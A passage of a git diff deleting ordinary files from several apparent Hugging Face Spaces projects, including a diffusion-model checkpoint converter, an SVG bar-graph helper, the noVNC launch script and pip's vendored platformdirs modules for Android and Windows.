torch.FloatTensor(ly_weight["pre_attention_layer_norm"]["scale"]) - ) - - lyr.layer[1].DenseReluDense.wi_0.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_0"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wi_1.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_1"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wo.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wo"]["kernel"].T)) - lyr.layer[1].layer_norm.weight = nn.Parameter(torch.FloatTensor(ly_weight["pre_mlp_layer_norm"]["scale"])) - - model.layer_norm.weight = nn.Parameter(torch.FloatTensor(weights["encoder_norm"]["scale"])) - - return model - - -def load_decoder(weights, model): - model.conditioning_emb[0].weight = nn.Parameter(torch.FloatTensor(weights["time_emb_dense0"]["kernel"].T)) - model.conditioning_emb[2].weight = nn.Parameter(torch.FloatTensor(weights["time_emb_dense1"]["kernel"].T)) - - model.position_encoding.weight = nn.Parameter( - torch.FloatTensor(weights["Embed_0"]["embedding"]), requires_grad=False - ) - - model.continuous_inputs_projection.weight = nn.Parameter( - torch.FloatTensor(weights["continuous_inputs_projection"]["kernel"].T) - ) - - for lyr_num, lyr in enumerate(model.decoders): - ly_weight = weights[f"layers_{lyr_num}"] - lyr.layer[0].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_self_attention_layer_norm"]["scale"]) - ) - - lyr.layer[0].FiLMLayer.scale_bias.weight = nn.Parameter( - torch.FloatTensor(ly_weight["FiLMLayer_0"]["DenseGeneral_0"]["kernel"].T) - ) - - attention_weights = ly_weight["self_attention"] - lyr.layer[0].attention.to_q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[0].attention.to_k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[0].attention.to_v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[0].attention.to_out[0].weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - - attention_weights = ly_weight["MultiHeadDotProductAttention_0"] - lyr.layer[1].attention.to_q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[1].attention.to_k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[1].attention.to_v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[1].attention.to_out[0].weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - lyr.layer[1].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_cross_attention_layer_norm"]["scale"]) - ) - - lyr.layer[2].layer_norm.weight = nn.Parameter(torch.FloatTensor(ly_weight["pre_mlp_layer_norm"]["scale"])) - lyr.layer[2].film.scale_bias.weight = nn.Parameter( - torch.FloatTensor(ly_weight["FiLMLayer_1"]["DenseGeneral_0"]["kernel"].T) - ) - lyr.layer[2].DenseReluDense.wi_0.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_0"]["kernel"].T)) - lyr.layer[2].DenseReluDense.wi_1.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_1"]["kernel"].T)) - lyr.layer[2].DenseReluDense.wo.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wo"]["kernel"].T)) - - model.decoder_norm.weight = nn.Parameter(torch.FloatTensor(weights["decoder_norm"]["scale"])) - - model.spec_out.weight = nn.Parameter(torch.FloatTensor(weights["spec_out_dense"]["kernel"].T)) - - return model - - -def main(args): - t5_checkpoint = checkpoints.load_t5x_checkpoint(args.checkpoint_path) - t5_checkpoint = jnp.tree_util.tree_map(onp.array, t5_checkpoint) - - gin_overrides = [ - "from __gin__ import dynamic_registration", - "from music_spectrogram_diffusion.models.diffusion import diffusion_utils", - "diffusion_utils.ClassifierFreeGuidanceConfig.eval_condition_weight = 2.0", - "diffusion_utils.DiffusionConfig.classifier_free_guidance = @diffusion_utils.ClassifierFreeGuidanceConfig()", - ] - - gin_file = os.path.join(args.checkpoint_path, "..", "config.gin") - gin_config = inference.parse_training_gin_file(gin_file, gin_overrides) - synth_model = inference.InferenceModel(args.checkpoint_path, gin_config) - - scheduler = DDPMScheduler(beta_schedule="squaredcos_cap_v2", variance_type="fixed_large") - - notes_encoder = SpectrogramNotesEncoder( - max_length=synth_model.sequence_length["inputs"], - vocab_size=synth_model.model.module.config.vocab_size, - d_model=synth_model.model.module.config.emb_dim, - dropout_rate=synth_model.model.module.config.dropout_rate, - num_layers=synth_model.model.module.config.num_encoder_layers, - num_heads=synth_model.model.module.config.num_heads, - d_kv=synth_model.model.module.config.head_dim, - d_ff=synth_model.model.module.config.mlp_dim, - feed_forward_proj="gated-gelu", - ) - - continuous_encoder = SpectrogramContEncoder( - input_dims=synth_model.audio_codec.n_dims, - targets_context_length=synth_model.sequence_length["targets_context"], - d_model=synth_model.model.module.config.emb_dim, - dropout_rate=synth_model.model.module.config.dropout_rate, - num_layers=synth_model.model.module.config.num_encoder_layers, - num_heads=synth_model.model.module.config.num_heads, - d_kv=synth_model.model.module.config.head_dim, - d_ff=synth_model.model.module.config.mlp_dim, - feed_forward_proj="gated-gelu", - ) - - decoder = T5FilmDecoder( - input_dims=synth_model.audio_codec.n_dims, - targets_length=synth_model.sequence_length["targets_context"], - max_decoder_noise_time=synth_model.model.module.config.max_decoder_noise_time, - d_model=synth_model.model.module.config.emb_dim, - num_layers=synth_model.model.module.config.num_decoder_layers, - num_heads=synth_model.model.module.config.num_heads, - d_kv=synth_model.model.module.config.head_dim, - d_ff=synth_model.model.module.config.mlp_dim, - dropout_rate=synth_model.model.module.config.dropout_rate, - ) - - notes_encoder = load_notes_encoder(t5_checkpoint["target"]["token_encoder"], notes_encoder) - continuous_encoder = load_continuous_encoder(t5_checkpoint["target"]["continuous_encoder"], continuous_encoder) - decoder = load_decoder(t5_checkpoint["target"]["decoder"], decoder) - - melgan = OnnxRuntimeModel.from_pretrained("kashif/soundstream_mel_decoder") - - pipe = SpectrogramDiffusionPipeline( - notes_encoder=notes_encoder, - continuous_encoder=continuous_encoder, - decoder=decoder, - scheduler=scheduler, - melgan=melgan, - ) - if args.save: - pipe.save_pretrained(args.output_path) - - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - - parser.add_argument("--output_path", default=None, type=str, required=True, help="Path to the converted model.") - parser.add_argument( - "--save", default=True, type=bool, required=False, help="Whether to save the converted model or not." - ) - parser.add_argument( - "--checkpoint_path", - default=f"{MODEL}/checkpoint_500000", - type=str, - required=False, - help="Path to the original jax model checkpoint.", - ) - args = parser.parse_args() - - main(args) diff --git a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/bargraph.py b/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/bargraph.py deleted file mode 100644 index b139175894d739cb2a6edc2ba1403f89a1488005..0000000000000000000000000000000000000000 --- a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/bargraph.py +++ /dev/null @@ -1,109 +0,0 @@ -from xml.etree import ElementTree as et - -def make_svg_bargraph(labels, heights, categories=None, palette=None, - barheight=100, barwidth=12, show_labels=True, file_header=False, - data_url=False): - if palette is None: - palette = default_bargraph_palette - if categories is None: - categories = [('', len(labels))] - unitheight = float(barheight) / max(max(heights, default=1), 1) - textheight = barheight if show_labels else 0 - labelsize = float(barwidth) - gap = float(barwidth) / 4 - # textsize = barwidth + gap - textsize = barwidth + gap / 2 - rollup = max(heights, default=1) - textmargin = float(labelsize) * 2 / 3 - leftmargin = 32 - rightmargin = 8 - svgwidth = len(heights) * (barwidth + gap) + 2 * leftmargin + rightmargin - svgheight = barheight + textheight - - # create an SVG XML element - svg = et.Element('svg', width=str(svgwidth), height=str(svgheight), - version='1.1', xmlns='http://www.w3.org/2000/svg') - - # Draw the bar graph - basey = svgheight - textheight - x = leftmargin - # Add units scale on left - if len(heights): - for h in [1, (max(heights) + 1) // 2, max(heights)]: - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;' + - 'text-anchor:end;alignment-baseline:hanging;' + - 'transform:translate(%dpx, %dpx);') % - (textsize, x - gap, basey - h * unitheight)).text = str(h) - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;' + - 'text-anchor:middle;' + - 'transform:translate(%dpx, %dpx) rotate(-90deg)') % - (textsize, x - gap - textsize, basey - h * unitheight / 2) - ).text = 'units' - # Draw big category background rectangles - for catindex, (cat, catcount) in enumerate(categories): - if not catcount: - continue - et.SubElement(svg, 'rect', x=str(x), y=str(basey - rollup * unitheight), - width=(str((barwidth + gap) * catcount - gap)), - height = str(rollup*unitheight), - fill=palette[catindex % len(palette)][1]) - x += (barwidth + gap) * catcount - # Draw small bars as well as 45degree text labels - x = leftmargin - catindex = -1 - catcount = 0 - for label, height in zip(labels, heights): - while not catcount and catindex <= len(categories): - catindex += 1 - catcount = categories[catindex][1] - color = palette[catindex % len(palette)][0] - et.SubElement(svg, 'rect', x=str(x), y=str(basey-(height * unitheight)), - width=str(barwidth), height=str(height * unitheight), - fill=color) - x += barwidth - if show_labels: - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;text-anchor:end;'+ - 'transform:translate(%dpx, %dpx) rotate(-45deg);') % - (labelsize, x, basey + textmargin)).text = label - x += gap - catcount -= 1 - # Text labels for each category - x = leftmargin - for cat, catcount in categories: - if not catcount: - continue - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;text-anchor:end;'+ - 'transform:translate(%dpx, %dpx) rotate(-90deg);') % - (textsize, x + (barwidth + gap) * catcount - gap, - basey - rollup * unitheight + gap)).text = '%d %s' % ( - catcount, cat + ('s' if catcount != 1 else '')) - x += (barwidth + gap) * catcount - # Output - this is the bare svg. - result = et.tostring(svg).decode('utf-8') - if file_header or data_url: - result = ''.join([ - '\n', - '\n', - result]) - if data_url: - import base64 - result = 'data:image/svg+xml;base64,' + base64.b64encode( - result.encode('utf-8')).decode('utf-8') - return result - -default_bargraph_palette = [ - ('#4B4CBF', '#B6B6F2'), - ('#55B05B', '#B6F2BA'), - ('#50BDAC', '#A5E5DB'), - ('#81C679', '#C0FF9B'), - ('#F0883B', '#F2CFB6'), - ('#D4CF24', '#F2F1B6'), - ('#D92E2B', '#F2B6B6'), - ('#AB6BC6', '#CFAAFF'), -] - diff --git a/spaces/paulokewunmi/jumia_product_search/image_search_engine/data/utils.py b/spaces/paulokewunmi/jumia_product_search/image_search_engine/data/utils.py deleted file mode 100644 index e2483825ad37b6b413e1044261dbbc4e98477e56..0000000000000000000000000000000000000000 --- a/spaces/paulokewunmi/jumia_product_search/image_search_engine/data/utils.py +++ /dev/null @@ -1,16 +0,0 @@ -import json -from pathlib import Path - -package_dir = Path(__file__).resolve().parents[1] - - -def load_config( - file_path=package_dir / "artifacts/config.json", -): - with open(file_path) as file: - data = json.load(file) - return data - - -if __name__ == "__main__": - load_config() diff --git a/spaces/paulokewunmi/jumia_product_search/image_search_engine/tests/__init__.py b/spaces/paulokewunmi/jumia_product_search/image_search_engine/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/pengtony/hackathon_chatbot_openai_api/README.md b/spaces/pengtony/hackathon_chatbot_openai_api/README.md deleted file mode 100644 index 74244c635d9cfdfbcb01d269720a19e11de2c584..0000000000000000000000000000000000000000 --- a/spaces/pengtony/hackathon_chatbot_openai_api/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: hackathon chatbot openai api -emoji: 🐨 -colorFrom: red -colorTo: gray -sdk: gradio -sdk_version: 3.20.1 -app_file: app.py -pinned: false -license: cc-by-4.0 -duplicated_from: baixing/hackathon_chatbot_openai_api ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/penguin2023/vncs/launch.sh b/spaces/penguin2023/vncs/launch.sh deleted file mode 100644 index 280a3aa1e478859123da0726386bf043db6f9335..0000000000000000000000000000000000000000 --- a/spaces/penguin2023/vncs/launch.sh +++ /dev/null @@ -1,167 +0,0 @@ -#!/usr/bin/env bash - -# Copyright (C) 2018 The noVNC Authors -# Licensed under MPL 2.0 or any later version (see LICENSE.txt) - -usage() { - if [ "$*" ]; then - echo "$*" - echo - fi - echo "Usage: ${NAME} [--listen PORT] [--vnc VNC_HOST:PORT] [--cert CERT] [--ssl-only]" - echo - echo "Starts the WebSockets proxy and a mini-webserver and " - echo "provides a cut-and-paste URL to go to." - echo - echo " --listen PORT Port for proxy/webserver to listen on" - echo " Default: 6080" - echo " --vnc VNC_HOST:PORT VNC server host:port proxy target" - echo " Default: localhost:5900" - echo " --cert CERT Path to combined cert/key file" - echo " Default: self.pem" - echo " --web WEB Path to web files (e.g. vnc.html)" - echo " Default: ./" - echo " --ssl-only Disable non-https connections." - echo " " - echo " --record FILE Record traffic to FILE.session.js" - echo " " - exit 2 -} - -NAME="$(basename $0)" -REAL_NAME="$(readlink -f $0)" -HERE="$(cd "$(dirname "$REAL_NAME")" && pwd)" -PORT="6080" -VNC_DEST="localhost:5900" -CERT="" -WEB="" -proxy_pid="" -SSLONLY="" -RECORD_ARG="" - -die() { - echo "$*" - exit 1 -} - -cleanup() { - trap - TERM QUIT INT EXIT - trap "true" CHLD # Ignore cleanup messages - echo - if [ -n "${proxy_pid}" ]; then - echo "Terminating WebSockets proxy (${proxy_pid})" - kill ${proxy_pid} - fi -} - -# Process Arguments - -# Arguments that only apply to chrooter itself -while [ "$*" ]; do - param=$1; shift; OPTARG=$1 - case $param in - --listen) PORT="${OPTARG}"; shift ;; - --vnc) VNC_DEST="${OPTARG}"; shift ;; - --cert) CERT="${OPTARG}"; shift ;; - --web) WEB="${OPTARG}"; shift ;; - --ssl-only) SSLONLY="--ssl-only" ;; - --record) RECORD_ARG="--record ${OPTARG}"; shift ;; - -h|--help) usage ;; - -*) usage "Unknown chrooter option: ${param}" ;; - *) break ;; - esac -done - -# Sanity checks -if bash -c "exec 7<>/dev/tcp/localhost/${PORT}" &> /dev/null; then - exec 7<&- - exec 7>&- - die "Port ${PORT} in use. Try --listen PORT" -else - exec 7<&- - exec 7>&- -fi - -trap "cleanup" TERM QUIT INT EXIT - -# Find vnc.html -if [ -n "${WEB}" ]; then - if [ ! -e "${WEB}/vnc.html" ]; then - die "Could not find ${WEB}/vnc.html" - fi -elif [ -e "$(pwd)/vnc.html" ]; then - WEB=$(pwd) -elif [ -e "${HERE}/../vnc.html" ]; then - WEB=${HERE}/../ -elif [ -e "${HERE}/vnc.html" ]; then - WEB=${HERE} -elif [ -e "${HERE}/../share/novnc/vnc.html" ]; then - WEB=${HERE}/../share/novnc/ -else - die "Could not find vnc.html" -fi - -# Find self.pem -if [ -n "${CERT}" ]; then - if [ ! -e "${CERT}" ]; then - die "Could not find ${CERT}" - fi -elif [ -e "$(pwd)/self.pem" ]; then - CERT="$(pwd)/self.pem" -elif [ -e "${HERE}/../self.pem" ]; then - CERT="${HERE}/../self.pem" -elif [ -e "${HERE}/self.pem" ]; then - CERT="${HERE}/self.pem" -else - echo "Warning: could not find self.pem" -fi - -# try to find websockify (prefer local, try global, then download local) -if [[ -e ${HERE}/websockify ]]; then - WEBSOCKIFY=${HERE}/websockify/run - - if [[ ! -x $WEBSOCKIFY ]]; then - echo "The path ${HERE}/websockify exists, but $WEBSOCKIFY either does not exist or is not executable." - echo "If you intended to use an installed websockify package, please remove ${HERE}/websockify." - exit 1 - fi - - echo "Using local websockify at $WEBSOCKIFY" -else - WEBSOCKIFY=$(which websockify 2>/dev/null) - - if [[ $? -ne 0 ]]; then - echo "No installed websockify, attempting to clone websockify..." - WEBSOCKIFY=${HERE}/websockify/run - git clone https://github.com/novnc/websockify ${HERE}/websockify - - if [[ ! -e $WEBSOCKIFY ]]; then - echo "Unable to locate ${HERE}/websockify/run after downloading" - exit 1 - fi - - echo "Using local websockify at $WEBSOCKIFY" - else - echo "Using installed websockify at $WEBSOCKIFY" - fi -fi - -echo "Starting webserver and WebSockets proxy on port ${PORT}" -#${HERE}/websockify --web ${WEB} ${CERT:+--cert ${CERT}} ${PORT} ${VNC_DEST} & -${WEBSOCKIFY} ${SSLONLY} --web ${WEB} ${CERT:+--cert ${CERT}} ${PORT} ${VNC_DEST} ${RECORD_ARG} & -proxy_pid="$!" -sleep 1 -if ! ps -p ${proxy_pid} >/dev/null; then - proxy_pid= - echo "Failed to start WebSockets proxy" - exit 1 -fi - -echo -e "\n\nNavigate to this URL:\n" -if [ "x$SSLONLY" == "x" ]; then - echo -e " http://$(hostname):${PORT}/vnc.html?host=$(hostname)&port=${PORT}\n" -else - echo -e " https://$(hostname):${PORT}/vnc.html?host=$(hostname)&port=${PORT}\n" -fi - -echo -e "Press Ctrl-C to exit\n\n" diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/android.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/android.py deleted file mode 100644 index 76527dda41f578f1caf3a0ef3256cd71b8e8d67a..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/android.py +++ /dev/null @@ -1,210 +0,0 @@ -"""Android.""" -from __future__ import annotations - -import os -import re -import sys -from functools import lru_cache -from typing import cast - -from .api import PlatformDirsABC - - -class Android(PlatformDirsABC): - """ - Follows the guidance `from here `_. Makes use of the - `appname `, - `version `, - `ensure_exists `. - """ - - @property - def user_data_dir(self) -> str: - """:return: data directory tied to the user, e.g. ``/data/user///files/``""" - return self._append_app_name_and_version(cast(str, _android_folder()), "files") - - @property - def site_data_dir(self) -> str: - """:return: data directory shared by users, same as `user_data_dir`""" - return self.user_data_dir - - @property - def user_config_dir(self) -> str: - """ - :return: config directory tied to the user, e.g. \ - ``/data/user///shared_prefs/`` - """ - return self._append_app_name_and_version(cast(str, _android_folder()), "shared_prefs") - - @property - def site_config_dir(self) -> str: - """:return: config directory shared by the users, same as `user_config_dir`""" - return self.user_config_dir - - @property - def user_cache_dir(self) -> str: - """:return: cache directory tied to the user, e.g. e.g. ``/data/user///cache/``""" - return self._append_app_name_and_version(cast(str, _android_folder()), "cache") - - @property - def site_cache_dir(self) -> str: - """:return: cache directory shared by users, same as `user_cache_dir`""" - return self.user_cache_dir - - @property - def user_state_dir(self) -> str: - """:return: state directory tied to the user, same as `user_data_dir`""" - return self.user_data_dir - - @property - def user_log_dir(self) -> str: - """ - :return: log directory tied to the user, same as `user_cache_dir` if not opinionated else ``log`` in it, - e.g. ``/data/user///cache//log`` - """ - path = self.user_cache_dir - if self.opinion: - path = os.path.join(path, "log") # noqa: PTH118 - return path - - @property - def user_documents_dir(self) -> str: - """:return: documents directory tied to the user e.g. ``/storage/emulated/0/Documents``""" - return _android_documents_folder() - - @property - def user_downloads_dir(self) -> str: - """:return: downloads directory tied to the user e.g. ``/storage/emulated/0/Downloads``""" - return _android_downloads_folder() - - @property - def user_pictures_dir(self) -> str: - """:return: pictures directory tied to the user e.g. ``/storage/emulated/0/Pictures``""" - return _android_pictures_folder() - - @property - def user_videos_dir(self) -> str: - """:return: videos directory tied to the user e.g. ``/storage/emulated/0/DCIM/Camera``""" - return _android_videos_folder() - - @property - def user_music_dir(self) -> str: - """:return: music directory tied to the user e.g. ``/storage/emulated/0/Music``""" - return _android_music_folder() - - @property - def user_runtime_dir(self) -> str: - """ - :return: runtime directory tied to the user, same as `user_cache_dir` if not opinionated else ``tmp`` in it, - e.g. ``/data/user///cache//tmp`` - """ - path = self.user_cache_dir - if self.opinion: - path = os.path.join(path, "tmp") # noqa: PTH118 - return path - - -@lru_cache(maxsize=1) -def _android_folder() -> str | None: - """:return: base folder for the Android OS or None if it cannot be found""" - try: - # First try to get path to android app via pyjnius - from jnius import autoclass - - context = autoclass("android.content.Context") - result: str | None = context.getFilesDir().getParentFile().getAbsolutePath() - except Exception: # noqa: BLE001 - # if fails find an android folder looking path on the sys.path - pattern = re.compile(r"/data/(data|user/\d+)/(.+)/files") - for path in sys.path: - if pattern.match(path): - result = path.split("/files")[0] - break - else: - result = None - return result - - -@lru_cache(maxsize=1) -def _android_documents_folder() -> str: - """:return: documents folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - documents_dir: str = context.getExternalFilesDir(environment.DIRECTORY_DOCUMENTS).getAbsolutePath() - except Exception: # noqa: BLE001 - documents_dir = "/storage/emulated/0/Documents" - - return documents_dir - - -@lru_cache(maxsize=1) -def _android_downloads_folder() -> str: - """:return: downloads folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - downloads_dir: str = context.getExternalFilesDir(environment.DIRECTORY_DOWNLOADS).getAbsolutePath() - except Exception: # noqa: BLE001 - downloads_dir = "/storage/emulated/0/Downloads" - - return downloads_dir - - -@lru_cache(maxsize=1) -def _android_pictures_folder() -> str: - """:return: pictures folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - pictures_dir: str = context.getExternalFilesDir(environment.DIRECTORY_PICTURES).getAbsolutePath() - except Exception: # noqa: BLE001 - pictures_dir = "/storage/emulated/0/Pictures" - - return pictures_dir - - -@lru_cache(maxsize=1) -def _android_videos_folder() -> str: - """:return: videos folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - videos_dir: str = context.getExternalFilesDir(environment.DIRECTORY_DCIM).getAbsolutePath() - except Exception: # noqa: BLE001 - videos_dir = "/storage/emulated/0/DCIM/Camera" - - return videos_dir - - -@lru_cache(maxsize=1) -def _android_music_folder() -> str: - """:return: music folder for the Android OS""" - # Get directories with pyjnius - try: - from jnius import autoclass - - context = autoclass("android.content.Context") - environment = autoclass("android.os.Environment") - music_dir: str = context.getExternalFilesDir(environment.DIRECTORY_MUSIC).getAbsolutePath() - except Exception: # noqa: BLE001 - music_dir = "/storage/emulated/0/Music" - - return music_dir - - -__all__ = [ - "Android", -] diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/windows.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/windows.py deleted file mode 100644 index b52c9c6ea89fc6859fbf3e489072c1b3b0af77fc..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/windows.py +++ /dev/null @@ -1,255 +0,0 @@ -"""Windows.""" -from __future__ import annotations - -import ctypes -import os -import sys -from functools import lru_cache -from typing import TYPE_CHECKING - -from .api import PlatformDirsABC - -if TYPE_CHECKING: - from collections.abc import Callable - - -class Windows(PlatformDirsABC): - """ - `MSDN on where to store app data files - `_. - Makes use of the - `appname `, - `appauthor `, - `version `, - `roaming `, - `opinion `, - `ensure_exists `. - """ - - @property - def user_data_dir(self) -> str: - """ - :return: data directory tied to the user, e.g. - ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appname`` (not roaming) or - ``%USERPROFILE%\\AppData\\Roaming\\$appauthor\\$appname`` (roaming) - """ - const = "CSIDL_APPDATA" if self.roaming else "CSIDL_LOCAL_APPDATA" - path = os.path.normpath(get_win_folder(const)) - return self._append_parts(path) - - def _append_parts(self, path: str, *, opinion_value: str | None = None) -> str: - params = [] - if self.appname: - if self.appauthor is not False: - author = self.appauthor or self.appname - params.append(author) - params.append(self.appname) - if opinion_value is not None and self.opinion: - params.append(opinion_value) - if self.version: - params.append(self.version) - path = os.path.join(path, *params) # noqa: PTH118 - self._optionally_create_directory(path) - return path - - @property - def site_data_dir(self) -> str: - """:return: data directory shared by users, e.g. ``C:\\ProgramData\\$appauthor\\$appname``""" - path = os.path.normpath(get_win_folder("CSIDL_COMMON_APPDATA")) - return self._append_parts(path) - - @property - def user_config_dir(self) -> str: - """:return: config directory tied to the user, same as `user_data_dir`""" - return self.user_data_dir - - @property - def site_config_dir(self) -> str: - """:return: config directory shared by the users, same as `site_data_dir`""" - return self.site_data_dir - - @property - def user_cache_dir(self) -> str: - """ - :return: cache directory tied to the user (if opinionated with ``Cache`` folder within ``$appname``) e.g. - ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appname\\Cache\\$version`` - """ - path = os.path.normpath(get_win_folder("CSIDL_LOCAL_APPDATA")) - return self._append_parts(path, opinion_value="Cache") - - @property - def site_cache_dir(self) -> str: - """:return: cache directory shared by users, e.g. ``C:\\ProgramData\\$appauthor\\$appname\\Cache\\$version``""" - path = os.path.normpath(get_win_folder("CSIDL_COMMON_APPDATA")) - return self._append_parts(path, opinion_value="Cache") - - @property - def user_state_dir(self) -> str: - """:return: state directory tied to the user, same as `user_data_dir`""" - return self.user_data_dir - - @property - def user_log_dir(self) -> str: - """:return: log directory tied to the user, same as `user_data_dir` if not opinionated else ``Logs`` in it""" - path = self.user_data_dir - if self.opinion: - path = os.path.join(path, "Logs") # noqa: PTH118 - self._optionally_create_directory(path) - return path - - @property - def user_documents_dir(self) -> str: - """:return: documents directory tied to the user e.g. ``%USERPROFILE%\\Documents``""" - return os.path.normpath(get_win_folder("CSIDL_PERSONAL")) - - @property - def user_downloads_dir(self) -> str: - """:return: downloads directory tied to the user e.g. ``%USERPROFILE%\\Downloads``""" - return os.path.normpath(get_win_folder("CSIDL_DOWNLOADS")) - - @property - def user_pictures_dir(self) -> str: - """:return: pictures directory tied to the user e.g. ``%USERPROFILE%\\Pictures``""" - return os.path.normpath(get_win_folder("CSIDL_MYPICTURES")) - - @property - def user_videos_dir(self) -> str: - """:return: videos directory tied to the user e.g. ``%USERPROFILE%\\Videos``""" - return os.path.normpath(get_win_folder("CSIDL_MYVIDEO")) - - @property - def user_music_dir(self) -> str: - """:return: music directory tied to the user e.g. ``%USERPROFILE%\\Music``""" - return os.path.normpath(get_win_folder("CSIDL_MYMUSIC")) - - @property - def user_runtime_dir(self) -> str: - """ - :return: runtime directory tied to the user, e.g. - ``%USERPROFILE%\\AppData\\Local\\Temp\\$appauthor\\$appname`` - """ - path = os.path.normpath(os.path.join(get_win_folder("CSIDL_LOCAL_APPDATA"), "Temp")) # noqa: PTH118 - return self._append_parts(path) - - -def get_win_folder_from_env_vars(csidl_name: str) -> str: - """Get folder from environment variables.""" - result = get_win_folder_if_csidl_name_not_env_var(csidl_name) - if result is not None: - return result - - env_var_name = { - "CSIDL_APPDATA": "APPDATA", - "CSIDL_COMMON_APPDATA": "ALLUSERSPROFILE", - "CSIDL_LOCAL_APPDATA": "LOCALAPPDATA", - }.get(csidl_name) - if env_var_name is None: - msg = f"Unknown CSIDL name: {csidl_name}" - raise ValueError(msg) - result = os.environ.get(env_var_name) - if result is None: - msg = f"Unset environment variable: {env_var_name}" - raise ValueError(msg) - return result - - -def get_win_folder_if_csidl_name_not_env_var(csidl_name: str) -> str | None: - """Get folder for a CSIDL name that does not exist as an environment variable.""" - if csidl_name == "CSIDL_PERSONAL": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Documents") # noqa: PTH118 - - if csidl_name == "CSIDL_DOWNLOADS": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Downloads") # noqa: PTH118 - - if csidl_name == "CSIDL_MYPICTURES": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Pictures") # noqa: PTH118 - - if csidl_name == "CSIDL_MYVIDEO": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Videos") # noqa: PTH118 - - if csidl_name == "CSIDL_MYMUSIC": - return os.path.join(os.path.normpath(os.environ["USERPROFILE"]), "Music") # noqa: PTH118 - return None - - -def get_win_folder_from_registry(csidl_name: str) -> str: - """ - Get folder from the registry. - - This is a fallback technique at best. I'm not sure if using the registry for these guarantees us the correct answer - for all CSIDL_* names. - """ - shell_folder_name = { - "CSIDL_APPDATA": "AppData", - "CSIDL_COMMON_APPDATA": "Common AppData", - "CSIDL_LOCAL_APPDATA": "Local AppData", - "CSIDL_PERSONAL": "Personal", - "CSIDL_DOWNLOADS": "{374DE290-123F-4565-9164-39C4925E467B}", - "CSIDL_MYPICTURES": "My Pictures", - "CSIDL_MYVIDEO": "My Video", - "CSIDL_MYMUSIC": "My Music", - }.get(csidl_name) - if shell_folder_name is None: - msg = f"Unknown CSIDL name: {csidl_name}" - raise ValueError(msg) - if sys.platform != "win32": # only needed for mypy type checker to know that this code runs only on Windows - raise NotImplementedError - import winreg - - key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders") - directory, _ = winreg.QueryValueEx(key, shell_folder_name) - return str(directory) - - -def get_win_folder_via_ctypes(csidl_name: str) -> str: - """Get folder with ctypes.""" - # There is no 'CSIDL_DOWNLOADS'. - # Use 'CSIDL_PROFILE' (40) and append the default folder 'Downloads' instead. - # https://learn.microsoft.com/en-us/windows/win32/shell/knownfolderid - - csidl_const = { - "CSIDL_APPDATA": 26, - "CSIDL_COMMON_APPDATA": 35, - "CSIDL_LOCAL_APPDATA": 28, - "CSIDL_PERSONAL": 5, - "CSIDL_MYPICTURES": 39, - "CSIDL_MYVIDEO": 14, - "CSIDL_MYMUSIC": 13, - "CSIDL_DOWNLOADS": 40, - }.get(csidl_name) - if csidl_const is None: - msg = f"Unknown 